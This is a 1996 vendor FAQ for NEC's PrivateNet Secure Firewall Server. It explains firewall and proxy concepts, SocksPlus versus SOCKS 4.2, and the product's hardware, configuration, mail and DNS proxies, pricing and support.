PROPRIETARY NOTICE AND LIABILITY DISCLAIMER The information disclosed in this document, including all designs and related materials, is the valuable property of NEC Technologies, Inc. (NEC) and/or its licensors. NEC and/or its licensors, as appropriate, reserve all patent, copyright, and other proprietary rights to this document, including all design, manufacturing, reproduction, use, and sales rights thereto, except to the extent said rights are expressly granted to others. This document does not constitute a warranty of any kind, express or implied, with respect to the NEC product(s) discussed in this document. Unless expressly provided for in a separate limited warranty statement obtained at the time of sale of the NEC product(s), NEC makes no warranties of any kind or nature concerning the NEC product(s) including (but not limited to) any warranties (express or implied) of merchantability, performance, fitness for a particular purpose or against infringement of intellectual property rights. As to information on limited warranties or lack thereof concerning all other product(s) discussed in this document, please contact the manufacturers of the respective product(s). To allow for design and specification improvements, the information in this document is subject to change at any time, without notice. Reproduction of this document or portions thereof without prior written approval of NEC is prohibited. NEC is a registered trademark of NEC Corporation. the PrivateNet Server and SocksPlus are trademarks of NEC Technologies, Inc. Other brands, logos, and product names are trademarks or registered trademarks of their respective holders. 1996 NEC Technologies. All rights reserved. TABLE OF CONTENTS GENERAL FIREWALL QUESTIONS 1. What is a firewall? 2. Why does my network need a firewall? 3. What things can a firewall protect? 4. What things can't a firewall protect against? 5. What is a virtual private network? PROXIES AND OPERATING SYSTEMS 6. What is a proxy? 7. Why do I need proxies? 8. Are all proxy technologies equal? 9. Is there a good alternative to SOCKS 4.2 ? 10. Why is BSD/OS a good choice for a firewall operating system? 11. I understand that Windows NT has a C2 security rating. Wouldn't NT make a better firewall operating system? THE PRIVATENET SECURE FIREWALL SERVER 12. What is PrivateNet? 13. Could you explain the PrivateNet server's architecture? 14. Do my client applications have to be changed if I decide to use the PrivateNet server? 15. What additional security features are provided? 16. What kind of user authentication is provided? 17. Can PrivateNet provide a VPN facility? 18. Can the PrivateNet server protect against unauthorized access between my internal subnets? 19. How does the PrivateNet server protect my internal subnet? Is the protection equal to what is provided for external network access? 20. How does the PrivateNet server allow me to control access to network services for individual client users? 21. Do my client applications have to be changed if I decide to use the PrivateNet server? 22. What commercial client applications currently support the SOCKS 4.2/SocksPlus proxy? 23. Can the PrivateNet server be connected to any network? 24. What hardware makes up the PrivateNet server? 25. What software makes up the PrivateNet server? 26. Has the PrivateNet server been thoroughly tested? SERVER CONFIGURATION 27. How do I configure the PrivateNet server? 28. How do I administer the PrivateNet server? 29. Who installs the PrivateNet server? 30. Will NEC provide me with documentation and an installation plan? 31. How long does it take to install a PrivateNet server? 32. What things must I have to install a PrivateNet server? PRIVATENET SERVER PURCHASE AND SUPPORT 33. How do I buy the PrivateNet server and what does it cost? 34. How do I get PrivateNet server upgrades? 35. What are your warranty and service options? 36. How are upgrades handled? OTHER PRIVATENET QUESTIONS 37. Does SocksPlus support UDP? 38. Will SocksPlus clients connect from the Internet? 39. What is the Telnet proxy? 40. What is the HTTP proxy? 41. What is the NNTP proxy? 42. How does the SMTP (e-mail) proxy work? 43. How does the domain name server work? 44. Is running a split name server required? THE PRIVATENET™ SECURE FIREWALL SERVER FIREWALL BASICS Q1. What is a firewall? A. A firewall is a defense mechanism for a network that creates a single narrow security choke point (or gate) through which all traffic must pass both to and from your network. Firewalls enforce a site's security access policies for its network based on access rules or access control list. There are a number of ways to control access, but in general the firewall can be thought of as a mechanism to filter and control traffic. Traditional firewalls are implemented through a combination of hosts and routers. A router can control (or filter) network traffic at the packet level; packets are allowed or denied based on the source/destination address of the port number. This control technique is called packet filtering. State-of-the-art firewalls are more than just generalized packet filters and often perform their functions from the circuit-level layer up through the application layer of the Open Systems Interconnect (OSI) model. These high-level firewalls typically do not allow a direct connection between hosts and clients on separate networks (such as your network and the Internet). Instead they use a mechanism called a "proxy" process to prevent traffic from passing directly between networks. These modern firewalls also log all access for tighter security audits. Up to Contents Q2. Why does my network need a firewall? A. Being connected to the Internet is like living in a rough neighborhood. Having a firewall can greatly reduce the risk that an Internet connection will compromise the safety of internal networks. A firewall supplements your existing security mechanisms and protects your network from unauthorized intruders, both external and internal to your organization. Firewalls limit your exposure. Many organizations use the Internet or are planning to use it as a tool for business. Unfortunately, an increasing number of people on the Internet are unscrupulous and may attack vulnerable electronic servers and networks. This presents a major security risk to your network and organization. A firewall can greatly reduce the risk of network break-in and the destruction or theft of data by creating a security choke point. A firewall allows you to easily manage and control access. The most secure firewalls use proxies to eliminate direct connections between networks. Up to Contents Q3. What things can a firewall protect? A. Firewalls can protect a network for both incoming and outgoing network traffic by enforcing your security policies, such as: Preventing unauthenticated logins from the "outside world," thereby stopping unauthorized users and vandals from getting access to the machines on your network. Hiding the internal address structure of the network(s) they protect, thus making it difficult for vandals to enter and move freely around your network. Blocking "inside" traffic from reaching the outside world. An example of this might be blocking one of your legitimate users from transferring files inside your network to other machines outside of it. Protecting subnets within your main network by performing the same functions for the subnets as they do for external networks. An example of this would be limiting end-user network access to your personnel server, which is isolated to its own subnet. You might only allow certain authorized personnel access to this subnet by hiding the subnet address scheme and limiting the services provided, such as the Telnet application. Up to Contents Q4. What things can't a firewall protect against? A. Firewalls can't protect against attacks that don't go through the firewall. An example might be a malicious employee who copies sensitive information to a diskette, removes the diskette from the office, and then releases it to someone outside your organization. Another example might be that of a trusted employee who sets up a "back door" entrance into your network, perhaps by attaching a dial-up modem to his desktop or laptop computer. Unauthorized people may also succeed in extracting information from employees who are trying to be helpful. Firewalls also cannot easily protect against viruses, and will be unlikely to do so in the foreseeable future. Virus protection should be implemented as part of a virus protection plan, since viruses can be introduced by many means. Up to Contents Q5. What is a virtual private network? A. Recently, there has been a great deal of discussion about virtual private networks. A virtual private network is just another name for an encrypted IP tunnel, typically crossing the Internet. Encryption ensures a high level of privacy in the data that is exchanged, allowing a secure and cost-effective alternative to privately leased lines. Most connections across the Internet are not encrypted and most data is exchanged in clear text, making the data vulnerable to snoopers. The use of encrypted tunnels prevents third parties from listening in on these connections. Up to Contents PROXIES AND OPERATING SYSTEMS Q6. What is a proxy? A. A proxy is a software mechanism that eliminates direct communication between client applications and their servers across separate networks or subnets. The proxies communicate between themselves. Typically, proxies: Are trusted middleware processes that hide the internal address structure of the network(s) they protect; Provide logs of the nature of the traffic crossing the firewall by looking at the content of the data packets; Limit the network services offered to end-users by security administrators; Provide secure authentication methods for end-user access. Up to Contents Q7. Why do I need proxies? A. You need proxies to: Guard your network against unauthorized access; Limit the network services provided for end-users to those who are authorized; Provide a secure authentication scheme independent of applications; Provide detailed security logging based on the application data stream, not just the packet headers. Up to Contents Q8. Are all proxy technologies equal? A. No. Different levels of security require different types of proxies. Two proxy technologies are used in modern firewalls: Circuit-Level Proxy -- Provides a medium level of security and is both flexible and adaptable to the access requirements of an organization. A circuit-level proxy implements a generalized proxy mechanism that relays IP connections from the originating application through the firewall to its destination. The proxy uses an authorization file to verify that a connection is permitted before completing the connection. One popular type of circuit-level proxy is a software protocol known as SOCKS 4.2. SOCKS 4.2 was jointly developed by various organizations, then implemented by Dave Koblas and made publicly available. NEC has been the steward of the free version of SOCKS 4.2 since 1993, managing the FTP site where SOCKS 4.2 source code is available and administering the SOCKS 4.2 mailing list where users of non-commercial SOCKS 4.2 trade notes on SOCKS 4.2 security, configuration and compatibility. Although SOCKS 4.2 is popular, it has several limitations: Its software is not layered, leaving it vulnerable to bad packets; It is vulnerable to IP spoofing attacks; It does not provide UDP support. Application-Level Proxy -- Provides a higher level of security by implementing a specific proxy mechanism for each application service. Application-level proxies "speak" the application protocol for each specific application (e.g. Telnet, FTP, SMTP, etc.). Application-level proxies screen the network traffic passing through the firewall and have an "understanding" of context of the data within the packets. This is not present in either circuit-level proxies or packet filtering mechanisms. The advantages of an application-level proxy over a circuit-level proxy are its ability to understand the flow of information and make intelligent decisions about the various kinds of requests within the packets. As an example, an application-level proxy can eliminate the possibility of using SMTP commands to extract information about the local user population on a network. Commands like EXPN (expanding a mail alias) or VRFY (verify the presence of a user) can be disabled. Up to Contents Q9. Is there a good alternative to SOCKS 4.2 ? A. The SocksPlusTM proxy is a great alternative to SOCKS 4.2 . The SocksPlus proxy is an advanced and secure circuit-level technology. The SocksPlus proxy was written from scratch by NEC to provide a commercial circuit-level proxy for the PrivateNet Secure Firewall Server and to avoid any intellectual property issues attached to SOCKS 4.2 . The SocksPlus proxy is more secure and commercially robust than the original SOCKS 4.2 protocol. SocksPlus has been improved from the original SOCKS 4.2 implementation in many ways. The SocksPlus proxy: Uses proper software layering, leaving it much less vulnerable to bad packet formats; Can be configured to listen only to client connections on the internal network to properly identify IP spoofing attacks that use internal network IP addresses, but which originate from the outside network; Provides UDP support in addition to the TCP support originally found in SOCKS 4.2 ; Provides for encrypted data communications between SocksPlus proxy servers; Supports parallel configurations, providing both high availability and load balancing between servers; Does not require a configuration file at each client (server information is obtained from DNS); Does not accumulate log information at each client. The SocksPlus proxy uses its own improved protocol when communicating with SocksPlus proxy clients and other SocksPlus proxy servers, but it is fully backward-compatible with existing SOCKS 4.2 servers and clients. If a site is already using SOCKS 4.2, deploying the SocksPlus proxy will not pose major problems. However, such sites are encouraged to convert to the SocksPlus proxy over time to take full advantage of NEC's improvements. Up to Contents Q10. Why is BSD/OS a good choice for a firewall operating system? A. The BSD operating system developed by Berkeley Software Design Inc. is based on the original system developed at the University of California at Berkeley. It has been carefully scrutinized for security holes by many people from various organizations. This is not true of proprietary operating systems. The base code for BSD has been running on thousands of computer systems for many years, proving the code is stable, reliable, and effective for network access. This may not be the case for more recently-developed operating systems. Up to Contents Q11. I understand that Windows/NT has a C2 security rating. Wouldn't NT make a better firewall operating system? A. A "C2" rating only refers to the system's security when not connected to a network. This rating says nothing about how secure the system is on a network. Also, C2 is a low security rating level. Up to Contents THE PRIVATENET SECURE FIREWALL SERVER Q12. What is PrivateNet? A. The PrivateNet Secure Firewall Server is a network firewall product developed by NEC Technologies' Internet Business Unit and comes complete as an off-the-shelf server including hardware and CD-ROM software. The PrivateNet server is scaleable, user-transparent, highly secure and easily configurable. It provides a high level of security for both internal networks (including subnets) and external network connections using a proxy server architecture. The PrivateNet server also logs all transactions, providing detailed audit trails for corporate security analysts. The PrivateNet server solves several crucial problems for corporate and departmental TCP/IP networks: It allows transparent user access to Internet services such as the World Wide Web (WWW), FTP, Telnet, Gopher, and other new applications as they are developed; It provides industry-leading protection of internal corporate networks against external intrusion; It allows efficient and easily administered partitioning of internal networks into secure subnets. Up to Contents Q13. Could you explain the PrivateNet server's architecture? A. The PrivateNet server is designed around a proxy server architecture consisting of a hybrid of two technologies (see Question 8): The SocksPlus circuit-level proxy for outgoing TCP/IP communications. Outgoing network connections that originate within your network are handled by the PrivateNet server's SocksPlus circuit-level proxy. Client applications that need to connect through the PrivateNet server to external networks must first be "Socksified" to communicate with the PrivateNet server. This means that client TCP/IP applications such as Telnet or FTP must first have the SOCKS 4.2 or SocksPlus proxy client libraries linked with them. Several commercial client TCP/IP applications in the UNIX, Windows, and Macintosh environments have already been modified for SOCKS 4.2 . NEC, through its Client Applications Program (CAP), continues to work with TCP/IP software vendors to increase the number of client applications that support SocksPlus. Specific application-level proxies for incoming TCP/IP communications. Incoming network connections are handled by the PrivateNet server's application-level proxies. These proxies handle specific TCP/IP client applications for incoming network connections from the outside world to protect against unauthorized access and snooping on a network or subnet. For example, the PrivateNet server's SMTP (Simple Mail Transfer Protocol) proxy disarms certain commands, such as EXPN (expanding a mail alias) and VRFY(verify the presence of a user), by not returning any useful information. They only echo back any argument given them. The security-hardened proxies add a further level of security and perform a number of functions such as user authentication, disallowing direct connections between client/server processes, hiding the internal network address scheme, and securing Telnet, UDP, mail (SMTP), news (NNTP) and Web Server (HTTP) services. NEC plans to add other application proxies to the PrivateNet Server. Up to Contents Q14. Do my client applications have to be changed if I decide to use the PrivateNet server? Sites already using SOCKS 4.2 will be able to switch to PrivateNet without any change. Over the longer term, they may choose to use SocksPlus clients to take full advantage of the improvements in the SocksPlus protocol. At new sites, it depends on what is currently being used. In many cases, the SOCKS 4.2 or SocksPlus proxy is already part of the client application and can communicate with the PrivateNet server without any modifications. Examples of vendors providing such clients are Netscape, FTP Software, Inc., NetManage, Hummingbird, and Spry/CompuServe. For UNIX client applications that do not contain SOCKS 4.2 or SocksPlus, it is necessary to recompile and relink the client with NEC's SocksPlus proxy library. This library contains the necessary wrappers for network-related system calls, so that the client can use SocksPlus to connect. NEC, through its Client Applications Program (CAP), continues to work with TCP/IP software vendors to further increase the availability of client applications that support SocksPlus. Up to Contents Q15. What additional security features are provided? A. Unlike packet filtering routers which authorize (permit or deny) each packet, the PrivateNet server uses a "connection filtering" authorization mechanism to determine if a connection should be made. Connection filtering determines authorization only when the connection is initially established and provides a more thorough connection authorization process than traditional packet filtering. When a request for a connection is received by the application-level proxy, the connection is verified based on the traditional source/destination address and port number. In addition, the arrival of all connections on the expected interface is verified. If a connection request claims to originate from the internal network but arrives on the interface connected to the outside network, it is recognized as a spoofing attempt. Once the PrivateNet server makes the decision to connect, it forwards all packets for that connection. For even greater security, the PrivateNet server comes with all its software, including the security-hardened BSDI UNIX operating system, on CD-ROM. This is highly secure because CD-ROM cannot be changed or erased. CD-ROM is used for initial installation, as well as normal operations. Initial installation is as simple. You connect the PrivateNet server to your network, insert the CD-ROM into the CD drive, turn on the machine, and answer some initial configuration questions about your network. The CD-ROM will be used for normal operations and server boot-up thereafter. Up to Contents Q16. What kind of user authentication is provided? A. The PrivateNet server provides security authentication for remote users who need incoming access to your internal network. Authentication is currently accomplished by a method known as secure network key (SNK) from Digital Pathways, Inc. SNK uses a calculator-based challenge/response mechanism for user authentication. A calculator must be provided to each authorized user. The PrivateNet server will issue an SNK password "challenge" and the user must enter this challenge into the calculator. The calculator then issues a one-time-only password "response" and the user must type the response back to the PrivateNet server. Assuming the one-time response is correct, the user gains access to your internal network. NEC is also looking at other authentication schemes. Up to Contents Q17. Can PrivateNet provide a VPN facility? A. The PrivateNet server provides a "Virtual Private Network" (VPN) facility by performing data encryption based on the DES or Triple-DES military encryption standards and employing the SocksPlus proxy protocol as transport. This enables a highly secure connection between multiple PrivateNet server devices and allows public networks, such as the Internet, to be used for secure communications. Performance is very good because data encryption/decryption only occurs at the first and last network hops. DES encryption uses a DES key to encrypt/decrypt communications sessions. Users should be cautioned to protect any random key(s) created and any floppy disks used to store these keys. Up to Contents Q18. Can the PrivateNet server protect against unauthorized access between my internal subnets? A. Yes. The PrivateNet server can be configured to filter out unauthorized network traffic packets between subnets. Via the "listen" instruction in the PrivateNet server configuration file, a subnet IP address may be defined to show on which interface and subnet client requests will arrive. Requests arriving on other network interfaces are not served. Up to Contents Q19. How does the PrivateNet server protect my internal subnet? Is the protection equal to what is provided for external network access? A. The PrivateNet server's proxies perform the same way for a subnet as they do for an internal network protected from the outside world. The PrivateNet server's proxies hide subnet IP addresses from other subnets like they hide addresses from the Internet, they authenticate connections via the "connection filtering" architecture previously described. The proxies disarm all dangerous commands for the protected subnet. Up to Contents Q20. How does the PrivateNet server allow me to control access to network services for individual client users? A. The PrivateNet Server can be configured to allow or disallow network services for specific client users on your network. This is accomplished via "client" instructions in a the PrivateNet server configuration file. These client instructions can be set to allow or disallow services for single or multiple client IP addresses. Up to Contents Q21. Do my client applications have to be changed if I decide to use the PrivateNet server? A. No. In many cases, SOCKS 4.2 or SocksPlus proxy is already part of your client application and can communicate with the PrivateNet server. These are clients provided by such vendors as Netscape, NetManage, FTP, SPRY, etc. For those MS Windows client applications which do not utilize SOCKS 4.2 or SocksPlus proxy, you will need to install NEC's dynamic load library and executable(s); e.g. for Microsoft Windows (SOCKSpls.dll and SOCKSpls.exe). For UNIX client applications which do not utilize SOCKS 4.2 or SocksPlus proxy, you will need to link NEC's SocksPlus proxy libraries to your UNIX client applications. Up to Contents Q22. What commercial client applications currently support the SOCKS 4.2/SocksPlus proxy? A. Netscape provides SOCKS 4.2 support on all of its platforms, and will therefore work with PrivateNet. In addition, SOCKS 4.2 is supported by FTP Software, Inc., NetManage and Mosaic from the Spry/CompuServe Internet Division. Up to Contents Q23. Can the PrivateNet server be connected to any network? A. Yes. The PrivateNet Server can be configured to work with any TCP/IP network. However, the PrivateNet server currently only supports Ethernet 10Base-T physical connections. NEC is in discussion with BSDI, DEC and other vendors to provide support for FDDI as well as other major network communications technologies. NEC plans to support other communications media such as Token Ring, Fast Ethernet, and T1. Up to Contents Q24. What hardware makes up the PrivateNet server? A. The PrivateNet server includes: 75-MHz Pentium processor 16 Mbyte RAM 540-Mbyte hard disk one 1.44-Mbyte floppy disk one 4X CD ROM drive two Ethernet interface cards Up to Contents Q25. What software makes up the PrivateNet server? A. The PrivateNet server includes the following software, all on CD-ROM: BSDI 2.0 UNIX operating system Complete set of NEC proxy and daemon SocksPlus proxy server software containing special encryption algorithms SocksPlus proxy client libraries located on an additional CD-ROM Up to Contents Q26. Has the PrivateNet server been thoroughly tested? A. Yes. In addition to normal development testing, the PrivateNet server has been tested at a number of Beta sites for several months. Beta sites include clients both internal and external to NEC. Up to Contents SERVER CONFIGURATION Q27. How do I configure the PrivateNet server? A. Provide TCP/IP information such as IP addresses, domain name, etc., requested by the PrivateNet server's automatic "Configure" script. Configure is run automatically just after boot time during installation. If necessary, Configure can be run again to reinitialize all configuration data by removing the Configure file and rebooting. A security administrator can completely reload and reconfigure the PrivateNet server in a matter of minutes using this procedure, thus ensuring that the server maintains its planned security functions with authorized configuration data and NEC-provided proxies. Up to Contents Q28. How do I administer the PrivateNet server? A. Update the PrivateNet server configuration data found in the SocksPlus.conf and authorize.conf files. The SocksPlus.conf file contains all rules necessary for access control and server-to-server connections. The rules are fairly traditional, using source and destination addresses and port numbers to determine if a given client should be allowed to connect through the server. The SocksPlus.conf file is also used to determine the behavior for server connections. Configuration statements determine which of the PrivateNet servers will be allowed to connect to other PrivateNet servers. These statements will also allow departmental servers to be administered separately from other PrivateNet servers at the corporate firewall level. The SocksPlus.conf file also provides for time-outs and limitation rules of connection types. The authorize.conf file contains the rules for how users can connect through a PrivateNet server. These rules determine which users can Telnet in from the Internet, what type of authentication should be used, and the kind of access each user will be allowed. Up to Contents PRIVATENET SERVER INSTALLATION Q29. Who installs the PrivateNet server? A. Typically, an NEC-authorized VAR will install the server, thus assuring a customer of a turnkey installation. Customers with a high level of networking and security expertise may choose to install the server themselves. NEC trains its VARs in basic installation and in various networking configurations with the PrivateNet server. NEC will assist with installation as needed. When the server is installed at complex sites, or sites with general security issues, the NEC Security Expert Referral Program (S.E.R.P.) will provide a source of security expertise. This network is made up of independent consultants who can assist the VAR and customers as needed. Up to Contents Q30. Will NEC provide me with documentation and an installation plan? A. In addition to technical, user, and installation manuals, NEC provides a configuration questionnaire with several example network configurations for each PrivateNet server. The VAR will give the questionnaire and network configuration to you before your installation. You should complete the questionnaire and work with the VAR to create a network design for the PrivateNet server. The server can then be installed either for new or existing networks. NEC will assist as needed with planning and installation. Up to Contents Q31. How long does it take to install a PrivateNet server? A. It takes 45 minutes to a few hours, depending on network hardware and software configuration and availability of the network for reconfiguration and physical cabling. Up to Contents Q32. What must I have to install a PrivateNet server? A. The following are needed: You must complete the Software License Agreement and send it back to the Internet Business Unit before installation. Typically the VAR will ensure that this is complete before installation. NEC will then provide a license key for activation of the CD-ROM-based software being installed on the PrivateNet server. The license number must be typed into the PrivateNet server during initial installation to activate the software. You need an ASCII terminal, PC or laptop computer that is capable of an industry-standard emulation such as VT-100 as well as a serial RS-232C cable (and possibly a null modem adapter). This is attached to the COM-1 console port on the PrivateNet server. The ASCII terminal will be used to configure the server initially . You will need one or two 10Base-T (RJ45) cables for attachment to your Ethernet network. You will also need a revised network design for your new PrivateNet server(s). Specific information needed: a new host name(s), internal IP address(es), internal network mask for your PrivateNet server(s), a physical network interface to the PrivateNet server (10Base-T), new external network IP address(es), external network mask, a fully qualified Internet domain name, IP address(es) of your internal name server(s), a fully qualified upstream DNS authoritative host name for your Internet domain, an IP address of the default route, and the fully qualified host name of the internal mail hub. Your VAR will help you. Up to Contents PRIVATENET SERVER PURCHASE AND SUPPORT Q33. How do I buy the PrivateNet server and what does it cost? A. You can buy the PrivateNet server from any VAR authorized by the Internet Business Unit. The list price is approximately $14,950, including hardware and CD-ROM software. Up to Contents Q34. How do I get PrivateNet server upgrades? A. The PrivateNet server software may be upgraded by simply removing the old CD-ROM, replacing it with the new CD-ROM upgrade, which is a complete package, and then rebooting the PrivateNet server. Upgrades will be announced by NEC and provided to our distributor, Ingram Micro. They will provide all upgrade replacement CDs to their NEC-approved VARs. The VARs will provide the upgrade to their customers. Up to Contents Q35. What are your warranty and service options? A. Warranty, service, and support requests are handled via a toll-free number (800-325-5500) on a seven-day, 24-hour basis. Maintenance is performed during normal business hours unless a customer purchases the 7 x 24 option, for which server maintenance is performed within an eight-hour time period in most major metropolitan areas. Hardware and software support include: Hardware: One year on-site warranty of all hardware components. After the first year, you may purchase a hardware maintenance contract through your VAR. Software: Software support includes bug fixes, updates, and bulletins. Up to Contents Q36. How are upgrades handled? A. The PrivateNet server software is upgraded by simply replacing the old CD-ROM with a new one. Upgrades will be announced by NEC and provided automatically to authorized VARs. The VARs will supply the upgrade to their customers. Up to Contents OTHER PRIVATENET QUESTIONS Q37. Does SocksPlus support UDP? A. Yes. SocksPlus supports UDP but for security reasons it is implemented as UDP over TCP. While filtering TCP circuits is difficult at best, securely filtering UDP connections is almost impossible. The difficulty is in the difference between the two types of connections. The TCP protocol implements a virtual circuit and keeps a context for the connection, whereas a UDP connection is a datagram protocol where each packet is an independent message. Providing UDP over TCP simplifies the implementation of the UDP relays significantly, and removes most of the problems normally experienced in providing UDP support through a firewall. While this strategy may be less efficient than a native UDP implementation, its simplicity and ease of security management by far justify the additional overhead. NEC believes the difference in performance for a reliable and safe native UDP solution would be negligible. Up to Contents Q38. Will SocksPlus clients connect from the Internet? A. The server provides a simple and very secure method to determine which interfaces will support client connections, and is one of the many places where a Òbelt and suspendersÓ design philosophy has been used for the PrivateNet server. In its recommended configuration the server will allow only client connections from the internal network, while outside connections will be rejected. The configuration provides a simple mechanism that allows the server administrator to specify which interfaces should accept SOCKS 4.2 and SocksPlus client connections. If a client attempts to connect to an interface that is not configured to accept clients connections, the server will reject the connection, and log the connection attempt. Up to Contents Q39. What is the Telnet proxy? A. The Telnet proxy provides a secure means to allow users to log into internal hosts from the Internet. When a user Telnets to the PrivateNet server, he is required to authenticate himself before he is allowed to connect to an internal host. The Telnet proxy has been designed to ensure good user authentication, which is based on a challenge/response server. SNK from Digital Pathways is available in PrivateNet Server Release 1.0, and other mechanisms will be added in future releases. Up to Contents Q40. What is the HTTP proxy? A. The HTTP proxy is primarily intended to export internal servers to the outside network. User access to external HTTP servers is better provided through SocksPlus proxy. Up to Contents Q41. What is the NNTP proxy? A. The NNTP proxy allows an internal Usenet News server to be connected to outside servers. Up to Contents Q42. How does the SMTP (e-mail) proxy work? A. The PrivateNet server provides a simple SMTP mail exchanger for e-mail connectivity between internal and external hosts. All mail passes through the PrivateNet server in three steps: The SMTP proxy receives the e-mail and stores it in a spool directory on the hard disk. This program has been kept as simple as possible to prevent attacks through e-mail. The postmaster program picks up the mail, stores it in the file, changes all occurrences of shell meta characters, if any, in the address portion of the mail, and hands the result to Sendmail for delivery. Sendmail delivers the mail in the usual manner. The advantage of this strategy is that it isolates Sendmail, a common source of security problems, from the network while still using it as a mail delivery agent. It keeps the SMTP proxy mechanism simple and does not require reimplementation of the address rewrite and delivery mechanisms. This implementation has the following advantages: Server administrators familiar with Sendmail configuration can make configuration changes as usual. Because the basic mechanism is unchanged, users are assured that no new bugs have been introduced into this complex server. By default the Sendmail configuration on the PrivateNet server uses a simple forwarding strategy. That is, all incoming e-mail is forwarded to a central mail hub or mail exchanger. This moves all user address resolution (such as the alias file) from the firewall to an internal host with easier access. The internal host is, therefore, simpler to maintain. Server administrators with a large user population can implement more complex mail delivery schemes by configuring Sendmail and the name service accordingly. Outgoing mail is delivered in a similar way using the PrivateNet server as a mail relay. In its simplest configuration, this is achieved by having all hosts forward e-mail to the mail hub which, in turn, uses the PrivateNet server as a smart host. (While this scheme is attractive in its simplicity, it is not appropriate for larger sites. However, such sites can keep their current strategy as long as all outgoing mail is delivered to the PrivateNet server.) Up to Contents Q43. How does the domain name server work? A. The domain name server on the PrivateNet firewall is configured as a split-name server. In this configuration, two tightly-coupled primary name servers are used with an appropriate number of secondaries. The software for both name servers is the unmodified standard UNIX name server. The PrivateNet server uses BIND version 4.9.3, which has many security improvements over the older versions of the software. The name server is configured as a traditional name server with the exception that it has information only about the servers connected to the public networks. (Typically this is the PrivateNet server alone). This allows sites on the Internet to obtain the information necessary to connect to the services offered by that site. Resolution of host name and addresses for the internal hosts is handled by an internal name server, which has all information about the internal hosts. Because the PrivateNet server does not perform any kind of packet forwarding, there is no way for the internal name server to connect to any name server on the outside. Instead, resolution of such inquiries is handled through the name server's "forwarder" mechanism, where the inquiry is forwarded to the external name server for resolution. Because the external name server can connect to other name servers across the Internet, it can resolve the inquiry in its usual manner and return the result to the internal name server. Special consideration should be given the PrivateNet server itself since it needs to resolve internal host names and addresses while keeping the name server cache uncontaminated with this information. The mechanism for this already exists through the resolver library. Because the PrivateNet server has a local resolver configuration file pointing to the internal name servers, all inquiries originating on the PrivateNet server are resolved by those name servers instead of the name server running on the PrivateNet server. Up to Contents Q44. Is running a split name server required? A. If you do not want to use a split name server, the name server on the PrivateNet server can be configured as the traditional primary or secondary name server with complete information about all internal hosts. However, if configured in that manner, information on all internal hosts would be readily available on the Internet even though these hosts could not be reached directly. This would provide crackers with a great source of information on the internal networks, which they could use to attack the hosts on those networks.

Up to Contents